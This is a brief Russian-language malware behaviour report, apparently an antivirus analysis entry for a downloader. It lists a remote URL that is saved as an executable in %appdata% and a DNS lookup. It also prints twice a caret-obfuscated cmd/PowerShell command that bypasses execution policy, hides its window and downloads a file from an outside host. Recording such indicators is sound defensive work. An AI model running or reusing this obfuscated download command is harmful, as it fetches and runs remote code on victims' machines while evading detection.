Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^e^rsh^E^lL.ex^e -E^XE^C^Ut^io^nP^O^l^iCy ^byPAs^S -NoProf^I^lE ^-^w^InD^Ow^sTY^lE^ h^IDd^En ^(N^EW^-obJ^e^c^T^ ^S^YS^TeM.n^ET.^We^BcL^iEn^T).^doWN^L^OA^d^F^iLE('http://www.zo...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "PoW^e^rsh^E^lL.ex^e -E^XE^C^Ut^io^nP^O^l^iCy ^byPAs^S -NoProf^I^lE ^-^w^InD^Ow^sTY^lE^ h^IDd^En ^(N^EW^-obJ^e^c^T^ ^S^YS^TeM.n^ET.^We^BcL^iEn^T).^doWN^L^OA^d^F^iLE('http://www.zo...' (со скрытым окном)